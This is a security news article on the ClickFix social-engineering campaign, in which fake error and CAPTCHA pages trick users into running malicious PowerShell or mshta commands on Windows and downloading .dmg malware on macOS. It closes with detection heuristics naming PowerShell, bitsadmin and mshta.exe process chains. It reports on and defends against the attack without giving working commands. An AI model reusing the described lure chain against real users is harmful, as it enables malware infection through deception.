A new social engineering tactic, known as ClickFix, has emerged, using deceptive error messages to prompt users to run harmful code.
The Sekoia Threat Detection & Research (TDR) team has recently detailed this tactic – first discovered by Proofpoint in March – in a new report published earlier today. This approach, called ClearFake, encourages users to copy and execute malicious PowerShell commands, enabling cybercriminals to infect users’ devices.
ClickFix exploits fake error messages across multiple platforms, such as Google Meet and Zoom, often mimicking error notifications on video conferencing pages to lure users.
When users attempt to troubleshoot the “error,” they inadvertently initiate a series of commands, downloading malware onto their device. Beyond video platforms, ClickFix has been found using fake CAPTCHA pages that urge users to complete steps that activate malicious code, causing infections on both Windows and macOS systems.
Different Infection Chains for Windows and macOS
ClickFix adapts its tactics to different operating systems, leveraging the unique behaviors of each. On macOS, for instance, users who click on a “fix it” prompt are guided through steps that initiate an automatic download and installation of malware in .dmg format.
On Windows, ClickFix relies on either a malicious mshta or PowerShell command, depending on the infection cluster being used. The mshta-based infections use a VBScript embedded in an HTML application, while PowerShell commands run directly from the user’s input.
These Windows infections often masquerade as troubleshooting actions and are specifically designed to appear as if they’re coming from the legitimate Explorer.exe process, making the malware difficult to detect.
ClickFix also uses GitHub and suspicious websites, where users often encounter redirection chains that lead them to fake CAPTCHAs. These deceptive pages use a simple PowerShell script that’s hard to detect but impactful.
Read more on malware detection: AI Boosts Malware Detection Rates by 70%
Detection and Prevention Techniques
Detecting ClickFix requires specialized tools. The TDR team suggests monitoring for:
-
PowerShell and bitsadmin processes, with mshta.exe as the parent process
-
Command lines containing URLs, which may indicate a malicious download
-
Network activities involving PowerShell connections to low-prevalence or suspicious domains
“Combining these detection techniques with threat intelligence strengthens defense mechanisms against these sophisticated social engineering techniques,” Sekoia said.
“As this technique is evolving, [we] will continue to track this delivery infrastructure and develop our detection capabilities to mitigate the risks associated with this threat.”